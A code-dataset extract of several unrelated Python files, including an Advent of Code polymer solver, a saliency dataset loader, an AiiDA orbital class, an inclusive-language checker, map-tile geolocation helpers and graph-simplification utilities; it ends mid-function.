content
stringlengths 5
1.05M
|
|---|
print('sub')
|
def crear_usuario(n,a,e=5): # el valor por default omite el elemento, la asignacion no debe tener espacios
return {
'nombre': n,
'apellido':a,
'nombre_completo': "{} {}".format(n,a),
'edad': e
}
codi = crear_usuario(n="David",a="Lares") # al identificarlo no hay pele (sin importar el orden)
print(codi['nombre'])
print(codi['apellido'])
print(codi['edad'])
|
#!/usr/bin/env python
from collections import defaultdict
sample = """NNCB
CH -> B
HH -> N
CB -> H
NH -> C
HB -> C
HC -> B
HN -> C
NN -> C
BH -> H
NC -> B
NB -> B
BN -> B
BB -> N
BC -> B
CC -> N
CN -> C"""
def parse(data):
template, rest = data.split("\n\n")
formula = {i[:2]: i[-1] for i in rest.split("\n")}
return template, formula
def step(template, formula, n):
pairs = {a + b: template.count(a + b) for
(a, b) in zip(template, template[1:])}
freq = defaultdict(int, {k: template.count(k) for k in set(template)})
for _ in range(n):
new_pairs = defaultdict(int)
for k, v in pairs.items():
new_pairs[k[0] + formula[k]] += v
new_pairs[formula[k] + k[1]] += v
freq[formula[k]] += v
pairs = new_pairs
return max(freq.values()) - min(freq.values())
if __name__ == "__main__":
template, formula = parse(sample)
s1 = step(template, formula, 10)
s2 = step(template, formula, 40)
print("sample1", s1, "INVALID" if s1 != 1588 else "")
print("sample2", s2, "INVALID" if s2 != 2188189693529 else "")
with open('input') as f:
data = f.read().strip()
template, formula = parse(data)
print("part1", step(template, formula, 10))
print("part2", step(template, formula, 40))
|
from enum import Enum
class TestSessionState(Enum):
"""An enumeration describing the possible states of a :class:`.TestSession`."""
IDLE = 1
"""The :class:`.TestSession` is idle and not running.
Configuration changes can occur during this state.
"""
RUNNING = 2
"""The :class:`.TestSession` is logging.
Configuration changes are not allowed during this state.
"""
INVALID_CONFIGURATION = 3
"""The project has a configuration error."""
NO_VALID_LOGGED_CHANNELS = 4
"""No channels have been configured, or all channels are disabled or not available."""
|
import os
import sys
import cv2
import numpy as np
from IPython import embed
from PIL import Image
from random import randint
from scipy import ndimage
import matplotlib.pylab as plt
import torch
from torch.utils.data import Dataset, DataLoader
from torchvision import transforms
size = (192, 256)
# BGR MODE
mean = [103.939, 116.779, 123.68]
PATH_SALICON = "/home/dataset/SALICON/"
def imageProcessing(image, saliency):
image = cv2.resize(image, (size[1], size[0]), interpolation=cv2.INTER_AREA).astype(np.float32)
saliency = cv2.resize(saliency, (size[1], size[0]), interpolation=cv2.INTER_AREA).astype(np.float32)
# remove mean value
image -= mean
augmentation = randint(0,3)
if augmentation == 0:
image = image[:,::-1,:]
saliency = saliency[:,::-1]
elif augmentation == 1:
image = image[::-1,:,:]
saliency = saliency[::-1,:]
elif augmentation == 2:
image = ndimage.rotate(image, 45)
saliency = ndimage.rotate(saliency, 45)
sqr = image.shape[0]
start1 = int((sqr-192)/2)+1
end1 = sqr-int((sqr-192)/2)
start2 = int((sqr-256)/2)+1
end2 = sqr-int((sqr-256)/2)
image = image[start1:end1, start2:end2,:]
saliency = saliency[start1:end1, start2:end2]
# convert to torch Tensor
image = np.ascontiguousarray(image)
saliency = np.ascontiguousarray(saliency)
image = torch.FloatTensor(image)
# swap channel dimensions
image = image.permute(2,0,1)
return image,saliency
class SALICON(Dataset):
def __init__(self, mode='train', return_path=False, N=None):
global PATH_SALICON
self.size = (192, 256)
# MEAN IN BGR MODE
self.mean = [103.939, 116.779, 123.68]
# self.mean = [123.68, 116.779, 103.939]
self.path_dataset = PATH_SALICON
self.path_images = os.path.join(self.path_dataset,'image', 'images')
self.path_saliency = os.path.join(self.path_dataset, 'maps', mode)
self.return_path = return_path
# get list images
list_names = os.listdir( os.path.join(self.path_dataset, 'fixations', mode) )
list_names = np.array([n.split('.')[0] for n in list_names])
self.list_names = list_names
if N is not None:
self.list_names = list_names[:N]
# embed()
print("Init dataset in mode {}".format(mode))
print("\t total of {} images.".format(self.list_names.shape[0]))
def __len__(self):
return self.list_names.shape[0]
def __getitem__(self, index):
# Image and saliency map paths
rgb_ima = os.path.join(self.path_images, self.list_names[index]+'.jpg')
sal_path = os.path.join(self.path_saliency, self.list_names[index]+'.png')
image = cv2.imread(rgb_ima)
saliency = cv2.imread(sal_path, 0)
return imageProcessing(image, saliency)
if __name__ == '__main__':
s = SALICON(mode='val', N=100)
image, saliency = s[0]
|
# -*- coding: utf-8 -*-
###########################################################################
# Copyright (c), The AiiDA team. All rights reserved. #
# This file is part of the AiiDA code. #
# #
# The code is hosted on GitHub at https://github.com/aiidateam/aiida_core #
# For further information on the license, see the LICENSE.txt file #
# For further information please visit http://www.aiida.net #
###########################################################################
"""
Classes for describing atomic orbitals.
Contains general Orbital class.
For subclasses of Orbital, see submodules.
"""
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
import math
from aiida.common.exceptions import ValidationError, MissingPluginError
from aiida.plugins.factory import BaseFactory
class Orbital(object):
"""
Base class for Orbitals. Can handle certain basic fields, their setting
and validation. More complex Orbital objects should then inherit from
this class
:param position: the absolute position (three floats) units in angstrom
:param x_orientation: x,y,z unit vector defining polar angle theta
in spherical coordinates unitless
:param z_orientation: x,y,z unit vector defining azimuthal angle phi
in spherical coordinates unitless
:param orientation_spin: x,y,z unit vector defining the spin orientation
unitless
:param diffusivity: Float controls the radial term in orbital equation
units are reciprocal Angstrom.
:param module_name: internal parameter, stores orbital type
"""
#NOTE x_orientation, z_orientation, spin_orientation, diffusivity might
#all need to be moved to RealHydrogenOrbital
_base_fields = ('position',
'x_orientation',
'z_orientation',
'spin_orientation',
'diffusivity',
'module_name', # Actually, this one is system reserved
)
def __init__(self):
self._orbital_dict = {}
def __repr__(self):
module_name = self.get_orbital_dict()['module_name']
return '<{}: {}>'.format(module_name, str(self))
def __str__(self):
raise NotImplementedError
def _validate_keys(self, input_dict):
"""
Checks all the input_dict and tries to validate them , to ensure
that they have been properly set raises Exceptions indicating any
problems that should arise during the validation
:param input_dict: a dictionary of inputs
:return: input_dict: the original dictionary with all validated kyes
now removed
:return: validated_dict: a dictionary containing all the input keys
which have now been validated.
"""
validated_dict = {}
for k in self._base_fields:
v = input_dict.pop(k, None)
if k == "module_name":
if v is None:
raise TypeError
try:
OrbitalFactory(v)
except (MissingPluginError, TypeError):
raise ValidationError("The module name {} was found to "
"be invalid".format(v))
if k == "position":
if v is None:
validated_dict.update({k: v})
continue
try:
v = list(float(i) for i in v)
if len(v) != 3:
raise ValueError
except (ValueError, TypeError):
raise ValueError("Wrong format for position, must be a"
" list of three float numbers.")
if "orientation" in k :
if v is None:
validated_dict.update({k: v})
continue
try:
v = list(float(i) for i in v)
if len(v) != 3:
raise ValueError
except (ValueError, TypeError):
raise ValueError("Wrong format for {}, must be a"
" list of three float numbers.")
# From a spherical cooridnate version of orientation
# try:
# v = tuple(float(i) for i in v)
# if len(v) != (2):
# raise ValueError
# if v[0] >= 2*math.pi or v[0] <= 0:
# raise ValueError
# if v[1] >= math.pi or v[1] <= 0:
# raise ValueError
# except(ValueError, TypeError):
# raise ValueError("Wrong format for {}, must be two tuples"
# " each having two floats theta, phi where"
# " 0<=theta<2pi and 0<=phi<=pi.".format(k))
if k == "diffusivity":
if v is None:
validated_dict.update({k: v})
continue
try:
v = float(v)
except ValueError:
raise ValidationError("Diffusivity must always be a float")
validated_dict.update({k: v})
return validated_dict
def set_orbital_dict(self, init_dict):
"""
Sets the orbital_dict, which can vary depending on the particular
implementation of this base class.
:param init_dict: the initialization dictionary
"""
if not isinstance(init_dict, dict):
raise Exception('You must supply a dict as an init')
# Adds the module_name in hard-coded manner
init_dict.update({"module_name": self._get_module_name()})
validated_dict = self._validate_keys(init_dict)
for k, v in validated_dict.items():
self._orbital_dict[k] = v
def get_orbital_dict(self):
"""
returns the internal keys as a dictionary
"""
output = {}
for k in self._default_fields:
try:
output[k] = self._orbital_dict[k]
except KeyError:
pass
return output
def _get_module_name(self):
"""
Sets the module name, or label, to the orbital
"""
return self.__module__.split('.')[-1]
def OrbitalFactory(entry_point):
"""
Return the Orbital plugin class for a given entry point
:param entry_point: the entry point name of the Orbital plugin
"""
return BaseFactory('aiida.common.orbital', entry_point)
|
#!/usr/bin/env python
# Copyright 2020 The Amber Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Script to check files for inclusive language. The script will scan all files
and flag non-inclusive terminology which is identified.
Usage, run the script from a folder and the script will scan down through that
folder.
"""
import fnmatch
import os
import re
import sys
REGEXES = [
r"(?i)black[-_]?list",
r"(?i)white[-_]?list",
r"(?i)gr[ea]y[-_]?list",
r"(?i)(first class citizen)",
r"(?i)black[-_]?hat",
r"(?i)white[-_]?hat",
r"(?i)gr[ea]y[-_]?hat",
r"(?i)master",
r"(?i)slave",
r"(?i)\bhim\b",
r"(?i)\bhis\b",
r"(?i)\bshe\b",
r"(?i)\bher\b",
r"(?i)\bhers\b",
r"(?i)\bman\b",
r"(?i)\bwoman\b",
r"(?i)\she\s",
r"(?i)\she$",
r"(?i)^he\s",
r"(?i)^he$",
r"(?i)\she['|\u2019]d\s",
r"(?i)\she['|\u2019]d$",
r"(?i)^he['|\u2019]d\s",
r"(?i)^he['|\u2019]d$",
r"(?i)\she['|\u2019]s\s",
r"(?i)\she['|\u2019]s$",
r"(?i)^he['|\u2019]s\s",
r"(?i)^he['|\u2019]s$",
r"(?i)\she['|\u2019]ll\s",
r"(?i)\she['|\u2019]ll$",
r"(?i)^he['|\u2019]ll\s",
r"(?i)^he['|\u2019]ll$",
r"(?i)grandfather",
r"(?i)\bmitm\b",
r"(?i)\bcrazy\b",
r"(?i)\binsane\b",
r"(?i)\bblind\sto\b",
r"(?i)\bflying\sblind\b",
r"(?i)\bblind\seye\b",
r"(?i)\bcripple\b",
r"(?i)\bcrippled\b",
r"(?i)\bdumb\b",
r"(?i)\bdummy\b",
r"(?i)\bparanoid\b",
r"(?i)\bsane\b",
r"(?i)\bsanity\b",
r"(?i)red[-_]?line",
]
SUPPRESSIONS = [
r"(?i)MS_SLAVE",
r"(?i)man[ -_]?page",
]
REGEX_LIST = []
for reg in REGEXES:
REGEX_LIST.append(re.compile(reg))
SUPPRESSION_LIST = []
for supp in SUPPRESSIONS:
SUPPRESSION_LIST.append(re.compile(supp))
def find(top, filename_glob, skip_glob_list):
"""Returns files in the tree rooted at top matching filename_glob but not
in directories matching skip_glob_list."""
file_list = []
for path, dirs, files in os.walk(top):
for glob in skip_glob_list:
for match in fnmatch.filter(dirs, glob):
dirs.remove(match)
for filename in fnmatch.filter(files, filename_glob):
if filename == os.path.basename(__file__):
continue
file_list.append(os.path.join(path, filename))
return file_list
def filtered_descendants(glob):
"""Returns glob-matching filenames under the current directory, but skips
some irrelevant paths."""
return find('.', glob, ['third_party', 'external', 'build*', 'out*',
'CompilerIdCXX', '.git'])
def check_match(filename, contents):
"""Check if contents contains any matching entries"""
ret = False
for reg in REGEX_LIST:
match = reg.search(contents)
if match:
suppressed = False
for supp in SUPPRESSION_LIST:
idx = match.start()
supp_match = supp.match(contents[idx:])
if supp_match:
suppressed = True
# This is a hack to handle the MS_ prefix that is needed
# to check for. Find a better way if we get more suppressions
# which modify the prefix of the string
if idx >= 3:
supp_match = supp.match(contents[idx - 3:])
if supp_match:
suppressed = True
if not suppressed:
# No matching suppression.
print("{}: found non-inclusive language: {}".format(
filename, match.group(0)))
ret = True
return ret
def alert_if_lang_matches(glob):
"""Prints names of all files matching non-inclusive language.
Finds all glob-matching files under the current directory and checks if they
contain the language pattern. Prints the names of all the files that
match.
Returns the total number of file names printed.
"""
verbose = False
printed_count = 0
for file in filtered_descendants(glob):
has_match = False
try:
with open(file, 'r', encoding='utf8') as contents:
if check_match(file, contents.read()):
printed_count += 1
except:
if verbose:
print("skipping {}".format(file))
return printed_count
def main():
globs = ['*']
count = 0
for glob in globs:
count += alert_if_lang_matches(glob)
sys.exit(count > 0)
if __name__ == '__main__':
main()
|
import os
import time
import torch
# --- Data ---
TARGET = ['Meara', 'BarChartLit'][0]
SEC = 1
# DATASET_NAME = "{} ({} sec)".format(TARGET, SEC)
DATASET_NAME = "confusion"
PATH_TO_DATASET = os.path.join("dataset", DATASET_NAME)
PATH_TO_SEQS = os.path.join(PATH_TO_DATASET, "sequences")
MAX_SEQ_LEN = 150
TRUNCATION_SIDE = ['head', 'tail'][0]
# -- Network --
INPUT_SIZE = 14
OUTPUT_SIZE = 2
HIDDEN_SIZE = 256
BIDIRECTIONAL = False
NUM_LAYERS = 1
DROPOUT = 0.0
RNN_TYPE = "GRU"
# --- Training ---
K = 10
NUM_REPETITIONS = 1
EPOCHS = 100
LEARNING_RATE = 0.00003
BATCH_SIZE = 128
PATH_TO_LOG = os.path.join("logs", "attention_rnn_" + str(time.time()))
PATH_TO_PRETRAINED = os.path.join("trained_models", "confusion")
# --- Device ---
if not torch.cuda.is_available():
print("WARNING: running on CPU since GPU is not available")
DEVICE = torch.device("cpu")
else:
DEVICE = torch.device(0)
|
"""Contains functions dealing with geolocation. This is mostly used for finding
coordinates from Slippy Map tiles and vice versa. Slippy Map tiles are used in
aerial imagery APIs.
For more information (and for the source of some of these functions) see
https://wiki.openstreetmap.org/wiki/Slippy_map_tilenames
"""
import math
def deg_to_tile(lat_deg, lon_deg, zoom):
"""Converts coordinates into the nearest x,y Slippy Map tile"""
lat_rad = math.radians(lat_deg)
n = 2.0 ** zoom
xtile = int((lon_deg + 180.0) / 360.0 * n)
ytile = int((1.0 - math.log(math.tan(lat_rad) + (1 / math.cos(lat_rad)))
/ math.pi) / 2.0 * n)
return (xtile, ytile)
def tile_to_deg(xtile, ytile, zoom):
"""Returns the coordinates of the northwest corner of a Slippy Map
x,y tile"""
n = 2.0 ** zoom
lon_deg = xtile / n * 360.0 - 180.0
lat_rad = math.atan(math.sinh(math.pi * (1 - 2 * ytile / n)))
lat_deg = math.degrees(lat_rad)
return (lat_deg, lon_deg)
def deg_to_tilexy(lat_deg, lon_deg, zoom):
"""Converts geocoordinates to an x,y position on a tile."""
lat_rad = math.radians(lat_deg)
n = 2.0 ** zoom
x = ((lon_deg + 180.0) / 360.0 * n)
y = ((1.0 - math.log(math.tan(lat_rad) + (1 / math.cos(lat_rad)))
/ math.pi) / 2.0 * n)
return (int((x % 1) * 256), int((y % 1) * 256))
def deg_to_tilexy_matrix(lat_deg, lon_deg, zoom, center_tile_xoffset = 1, center_tile_yoffset = 1):
"""Converts geocoordinates to an x,y position on a tile matrix.
For a 3x3 tile matrix, the image used is the center tile, so pass
1 for center_tile_xoffset and 1 for center_tile_yoffset"""
x, y = deg_to_tilexy(lat_deg, lon_deg, zoom)
return (256 * center_tile_xoffset + x, 256 * center_tile_yoffset + y)
def tilexy_to_deg(xtile, ytile, zoom, x, y):
"""Converts a specific location on a tile (x,y) to geocoordinates."""
decimal_x = xtile + x / 256
decimal_y = ytile + y / 256
n = 2.0 ** zoom
lon_deg = decimal_x / n * 360.0 - 180.0
lat_rad = math.atan(math.sinh(math.pi * (1 - 2 * decimal_y / n)))
lat_deg = math.degrees(lat_rad)
return (lat_deg, lon_deg)
def tilexy_to_absxy(xtile, ytile, zoom, x, y):
"""Convert x,y on a tile to absolute x,y coordinates."""
return (xtile * 256 + x, ytile * 256 + y)
def absxy_to_tilexy(xtile, ytile, zoom, abs_x, abs_y):
"""Convert absolute x,y coordinates to tile x,y coordinates."""
return (abs_x - xtile * 256, abs_y - ytile * 256)
def deg_to_absxy(lat_deg, lon_deg, zoom):
"""Convert lat/long to absolute x,y"""
tilex, tiley = deg_to_tile(lat_deg, lon_deg, zoom)
tilex *= 256
tiley *= 256
x, y = deg_to_tilexy(lat_deg, lon_deg, zoom)
tilex += x
tiley += y
return (tilex, tiley)
def absxy_to_deg(abs_x, abs_y, zoom):
"""Convert absolute x,y to lat/long."""
lat, lon = tilexy_to_deg(int(abs_x / 256), int(abs_y / 256), zoom, abs_x % 256, abs_y % 256)
return (lat, lon)
def tilexy_to_deg_matrix(xtile, ytile, zoom, x, y, center_tile_xoffset = 1, center_tile_yoffset = 1):
"""Converts an x,y position on a tile matrix to geocoordinates.
For a 3x3 tile matrix, the image used is the center tile, so pass
1 for center_tile_xoffset and 1 for center_tile_yoffset"""
return tilexy_to_deg(xtile - center_tile_xoffset, ytile - center_tile_yoffset, zoom, x, y)
|
from django.contrib import admin
from site_settings.models import SiteSettings
class SingletonModelAdmin(admin.ModelAdmin):
"""Prevent deletion or adding rows"""
actions = None
def has_add_permission(self, request, obj=None):
return False
def has_delete_permission(self, request, obj=None):
return False
@admin.register(SiteSettings)
class SiteSettingsAdmin(SingletonModelAdmin):
def planning_file_link(self, obj):
if obj.file:
return "<a href='%s'>download</a>" % (obj.file.url,)
else:
return "No attachment"
|
import logging as lg
import random
import string
import warnings
from typing import List, Tuple
import geopandas as gpd
import networkx as nx
import numpy as np
import pandas as pd
from shapely.geometry import LineString, Point
from .utilities import log
def great_circle_vec(lat1: float,
lng1: float,
lat2: float,
lng2: float,
earth_radius: float=6371009.0) -> float:
"""
Vectorized function to calculate the great-circle distance between two
points or between vectors of points.
Please note that this method is copied from OSMnx method of the same name,
which can be accessed here:
https://github.com/gboeing/osmnx/blob/
b32f8d333c6965a0d2f27c1f3224a29de2f08d55/osmnx/utils.py#L262
Parameters
----------
lat1 : float or array of float
lng1 : float or array of float
lat2 : float or array of float
lng2 : float or array of float
earth_radius : numeric
radius of earth in units in which distance will be returned (default is
meters)
Returns
-------
distance : float
distance or vector of distances from (lat1, lng1) to (lat2, lng2) in
units of earth_radius
"""
phi1 = np.deg2rad(90 - lat1)
phi2 = np.deg2rad(90 - lat2)
theta1 = np.deg2rad(lng1)
theta2 = np.deg2rad(lng2)
cos = (np.sin(phi1) * np.sin(phi2) * np.cos(theta1 - theta2)
+ np.cos(phi1) * np.cos(phi2))
# Ignore warnings during this calculation because numpy warns it cannot
# calculate arccos for self-loops since u==v
with warnings.catch_warnings():
warnings.simplefilter('ignore')
arc = np.arccos(cos)
# Return distance in units of earth_radius
distance = arc * earth_radius
return distance
def generate_random_name(N: int=5):
choices = (string.ascii_uppercase + string.digits)
return ''.join(random.SystemRandom().choice(choices) for _ in range(N))
def generate_graph_node_dataframe(G):
# This method breaks out a portion of a similar method from
# OSMnx's get_nearest_node; source:
# https://github.com/gboeing/osmnx/blob/
# b32f8d333c6965a0d2f27c1f3224a29de2f08d55/osmnx/utils.py#L326
if not G or (G.number_of_nodes() == 0):
raise ValueError('G argument must be not be empty or '
'should contain at least one node')
# Dump graph node coordinates array
clist = []
for node, data in G.nodes(data=True):
# Ensure that each items is cast as the correct typegi
x = float(data['x'])
y = float(data['y'])
clist.append([node, x, y])
#coords = np.array(clist)
coords = np.array(clist, dtype='O')
# Then make into a Pandas DataFrame, with the node as index (type string)
df = pd.DataFrame(coords, columns=['node', 'x', 'y'])
#df['node'] = df['node'].astype(str)
df = df.set_index('node')
return df
def get_nearest_nodes(df_orig: pd.DataFrame,
point: Tuple[float, float],
connection_threshold: float,
exempt_id: str=None):
# This method breaks out a portion of a similar method from
# OSMnx's get_nearest_node; source:
# https://github.com/gboeing/osmnx/blob/
# b32f8d333c6965a0d2f27c1f3224a29de2f08d55/osmnx/utils.py#L326
# Make a copy of the DataFrame to prevent mutation outside of function
df = df_orig.copy()
if exempt_id is not None:
#df.index = df.index.astype(str)
mask = ~(df.index == exempt_id)
df = df[mask]
# Add second column of reference points
df['reference_y'] = point[0]
df['reference_x'] = point[1]
# TODO: OSMnx supports euclidean as well, for now we have a stumped
# version of this same function
# Ensure each vectorized series is typed correctly
ref_ys = df['reference_y'].astype(float)
ref_xs = df['reference_x'].astype(float)
ys = df['y'].astype(float)
xs = df['x'].astype(float)
# Calculate distance vector using great circle distances (ie, for
# spherical lat-long geometries)
distances = great_circle_vec(lat1=ref_ys,
lng1=ref_xs,
lat2=ys,
lng2=xs)
# Filter out nodes outside connection threshold
mask = (distances < connection_threshold)
nearest_nodes = distances[mask]
# Return filtered series
return nearest_nodes
def nan_helper(y):
"""
Helper to handle indices and logical indices of NaNs.
From: https://stackoverflow.com/questions/6518811/
interpolate-nan-values-in-a-numpy-array#6518811
Input:
- y, 1d numpy array with possible NaNs
Output:
- nans, logical indices of NaNs
- index, a function, with signature indices= index(logical_indices),
to convert logical indices of NaNs to 'equivalent' indices
Example:
>>> # linear interpolation of NaNs
>>> nans, x= nan_helper(y)
>>> y[nans]= np.interp(x(nans), x(~nans), y[~nans])
"""
return (np.isnan(y), lambda z: z.to_numpy().nonzero()[0])
def reproject(G: nx.MultiDiGraph, to_epsg: int=2163) -> nx.MultiDiGraph:
# Avoid upstream mutation of the graph
G = G.copy()
# First extract current crs
orig_crs = G.graph['crs']
# And get the array of nodes from original graph
ref_node_array = list(G.nodes(data=True))
all_pts = []
for i, node in ref_node_array:
all_pts.append(Point(node['x'], node['y']))
# Convert the collected nodes to GeoSeries
gs = gpd.GeoSeries(all_pts)
# And then reproject from original crs to new
gs.crs = orig_crs
gs = gs.to_crs(epsg=to_epsg)
# Now iterate back through the reprojected points
# and add each to it's respected node
for (i, node), new_pt in zip(ref_node_array, gs):
G.nodes[i]['x'] = new_pt.x
G.nodes[i]['y'] = new_pt.y
# Update the graph's coordinate reference
G.graph['crs'] = {'init': 'epsg:{}'.format(to_epsg)}
# Return the reprojected copy
return G
def coalesce(
G_orig: nx.MultiDiGraph,
resolution: float,
edge_summary_method=lambda x: x.max(),
boarding_cost_summary_method=lambda x: x.mean(),
) -> nx.MultiDiGraph:
# Note: Feature is experimental. For more details, see
# https://github.com/kuanb/peartree/issues/126
warnings.warn((
'coalesce method is experimental - method risks '
'deformation of relative graph structure'))
# Make sure our resolution satisfies basic requirement
if resolution < 1:
raise ValueError('Resolution parameters must be >= 1')
# Avoid upstream mutation of the graph
G = G_orig.copy()
# Before we continue, attempt to simplfy the current network
# such that we won't generate isolated nodes that become disconnected
# from key coalesced nodes (because too many intermediary nodes)
G = simplify_graph(G)
# Extract all x, y values
grouped = {}
for i, node in G.nodes(data=True):
x = (round(node['x'] / resolution) * resolution)
y = (round(node['y'] / resolution) * resolution)
# Build the dictionary as needed
if x not in grouped:
grouped[x] = {}
if y not in grouped[x]:
grouped[x][y] = []
# Append each node under its approx. area grouping
grouped[x][y].append(i)
# Generate a series of reference dictionaries that allow us
# to assign a new node name to each grouping of nodes
counter = 0
new_node_coords = {}
lookup = {}
# Populate the fresh reference dictionaries
for x in grouped:
for y in grouped[x]:
new_node_name = '{}_{}'.format(G.name, counter)
new_node_coords[new_node_name] = {'x': x, 'y': y}
# Pair each newly generate name to the original node id,
# preserved from the original groupings resulting array
for n in grouped[x][y]:
lookup[n] = new_node_name
# Update the counter so each new synthetic
# node name will be different
counter += 1
# Recast the lookup crosswalk as a series for convenience
reference = pd.Series(lookup)
# Get the following attributes:
# 1. average boarding cost for each node grouping
# 2. modes associated with each node grouping
for nni in new_node_coords:
# Initialize an empty list
boarding_costs = []
all_modes_related = []
# Get all original nodes that have been grouped
g_nodes = reference.loc[reference == nni].index.values
# Iterate through and add gather costs
for i in g_nodes:
specific_node = G.nodes[i]
bc = specific_node['boarding_cost']
boarding_costs.append(bc)
this_nodes_modes = specific_node['modes']
all_modes_related.extend(this_nodes_modes)
# Calculate the summary boarding costs
# and assign it to the new nodes objects
new_node_coords[nni]['boarding_cost'] = (
boarding_cost_summary_method(np.array(boarding_costs)))
# Get all unique modes and assign it to the new nodes objects
sorted_set_list = sorted(list(set(all_modes_related)))
new_node_coords[nni]['modes'] = sorted_set_list
# First step to creating a list of replacement edges
replacement_edges_fr = []
replacement_edges_to = []
replacement_edges_len = []
for n1, n2, edge in G.edges(data=True):
# This will be used to parse out which edges to keep
replacement_edges_fr.append(reference[n1])
replacement_edges_to.append(reference[n2])
replacement_edges_len.append(edge['length'])
# This takes the resulting matrix and converts it to a pandas DataFrame
edges_df = pd.DataFrame({
'fr': replacement_edges_fr,
'to': replacement_edges_to,
'len': replacement_edges_len})
# Next we group by the edge pattern (from -> to)
grouped = edges_df.groupby(['fr', 'to'], sort=False)
# With the resulting groupings, we extract values
# TODO: Also group on modes
processed_edge_costs = edge_summary_method(grouped['len'])
# Second step; which uses results from edge_df grouping/parsing
edges_to_add = []
for n1, n2, edge in G.edges(data=True):
# Get corresponding ids of new nodes (grid corners)
ref_n1 = reference[n1]
ref_n2 = reference[n2]
# Retrieve pair value from previous grouping operation
avg_length = processed_edge_costs.loc[ref_n1, ref_n2]
edges_to_add.append((
ref_n1,
ref_n2,
avg_length,
edge['mode']))
# Add the new edges to graph
for n1, n2, length, mode in edges_to_add:
# Only add edge if it has not yet been added yet
if G.has_edge(n1, n2):
continue
# Also avoid edges that now connect to the same node
if n1 == n2:
continue
G.add_edge(n1, n2, length=length, mode=mode)
# Now we can remove all edges and nodes that predated the
# coalescing operations
for n in reference.index:
# Note that this will also drop all edges
G.remove_node(n)
# Also make sure to update the new nodes with their summary
# stats and locational data
for i, node in new_node_coords.items():
if G.has_node(i):
# For all other nodes, preserve them by re-populating
for key in node:
G.nodes[i][key] = node[key]
return G
def _path_has_consistent_mode_type(G, path):
# Makes sure that no mixed transit+walk network components
# made it through the get_paths... method - we do not want to
# mix modes during the simplification process
path_modes = []
for u, v in zip(path[:-1], path[1:]):
edge_count = G.number_of_edges(u, v)
for i in range(edge_count):
edge = G.edges[u, v, i]
path_modes.append(edge['mode'])
path_clear = all(x == path_modes[0] for x in path_modes)
return path_clear
def is_endpoint(G: nx.Graph, node: int, strict=True):
"""
Return True if the node is a "real" endpoint of an edge in the network, \
otherwise False. OSM data includes lots of nodes that exist only as \
points to help streets bend around curves. An end point is a node that \
either: \
1) is its own neighbor, ie, it self-loops. \
2) or, has no incoming edges or no outgoing edges, ie, all its incident \
edges point inward or all its incident edges point outward. \
3) or, it does not have exactly two neighbors and degree of 2 or 4. \
4) or, if strict mode is false, if its edges have different OSM IDs.
Please note this method is taken directly from OSMnx, and can be found in \
its original form, here: \
https://github.com/gboeing/osmnx/blob/ \
c5916aab5c9b94c951c8fb1964c841899c9467f8/osmnx/simplify.py#L22-L88
Parameters
----------
G : networkx multidigraph
The NetworkX graph being evaluated
node : int
The node to examine
strict : bool
If False, allow nodes to be end points even if they fail all other \
rules but have edges with different OSM IDs
Returns
-------
bool
Indicates whether or not the node is indeed an endpoint
"""
neighbors = set(list(G.predecessors(node)) + list(G.successors(node)))
n = len(neighbors)
d = G.degree(node)
if node in neighbors:
# If the node appears in its list of neighbors, it self-loops. this is
# always an endpoint.
return True
# If node has no incoming edges or no outgoing edges, it must be an
# endpoint
elif G.out_degree(node) == 0 or G.in_degree(node) == 0:
return True
elif not (n == 2 and (d == 2 or d == 4)):
# Else, if it does NOT have 2 neighbors AND either 2 or 4 directed
# edges, it is an endpoint. either it has 1 or 3+ neighbors, in which
# case it is a dead-end or an intersection of multiple streets or has
# 2 neighbors but 3 degree (indicating a change from oneway to twoway)
# or more than 4 degree (indicating a parallel edge) and thus is an
# endpoint
return True
elif not strict:
# Non-strict mode
osmids = []
# Add all the edge OSM IDs for incoming edges
for u in G.predecessors(node):
for key in G[u][node]:
osmids.append(G.edges[u, node, key]['osmid'])
# Add all the edge OSM IDs for outgoing edges
for v in G.successors(node):
for key in G[node][v]:
osmids.append(G.edges[node, v, key]['osmid'])
# If there is more than 1 OSM ID in the list of edge OSM IDs then it is
# an endpoint, if not, it isn't
return len(set(osmids)) > 1
else:
# If none of the preceding rules returned true, then it is not an
# endpoint
return False
def build_path(
G: nx.Graph,
node: int,
endpoints: List[int],
path: List[int]) -> List[int]:
"""
Recursively build a path of nodes until you hit an endpoint node.
Please note this method is taken directly from OSMnx, and can be found in \
its original form, here: \
https://github.com/gboeing/osmnx/blob/ \
c5916aab5c9b94c951c8fb1964c841899c9467f8/osmnx/simplify.py#L91-L131
Parameters
----------
G : networkx multidigraph
node : int
the current node to start from
endpoints : set
the set of all nodes in the graph that are endpoints
path : list
the list of nodes in order in the path so far
Returns
-------
paths_to_simplify : list
"""
# For each successor in the passed-in node
for successor in G.successors(node):
if successor not in path:
# If successor is already in path, ignore it, otherwise add to path
path.append(successor)
if successor not in endpoints:
# If successor not endpoint, recursively call
# build_path until endpoint found
path = build_path(G, successor, endpoints, path)
else:
# If successor is endpoint, path is completed, so return
return path
if (path[-1] not in endpoints) and (path[0] in G.successors(path[-1])):
# If end of the path is not actually an endpoint and the path's
# first node is a successor of the path's final node, then this is
# actually a self loop, so add path's first node to end of path to
# close it
path.append(path[0])
return path
def get_paths_to_simplify(G: nx.Graph, strict: bool=True) -> List[List[int]]:
"""
Create a list of all the paths to be simplified between endpoint nodes. \
The path is ordered from the first endpoint, through the interstitial \
nodes, to the second endpoint.
Please note this method is taken directly from OSMnx, and can be found in \
its original form, here: \
https://github.com/gboeing/osmnx/blob/ \
c5916aab5c9b94c951c8fb1964c841899c9467f8/osmnx/simplify.py#L134-L181
Parameters
----------
G : networkx multidigraph
strict : bool
if False, allow nodes to be end points even if they fail all other \
rules but have edges with different OSM IDs
Returns
-------
paths_to_simplify : lists
Returns a nested set of lists, containing the paths (node ID arrays) \
for each group of vertices that can be consolidated
"""
# First identify all the nodes that are endpoints
endpoints = set([node for node in G.nodes()
if is_endpoint(G, node, strict=strict)])
# Initialize the list to be returned; an empty list
paths_to_simplify = []
# For each endpoint node, look at each of its successor nodes
for node in endpoints:
for successor in G.successors(node):
if successor not in endpoints:
# if the successor is not an endpoint, build a path from the
# endpoint node to the next endpoint node
try:
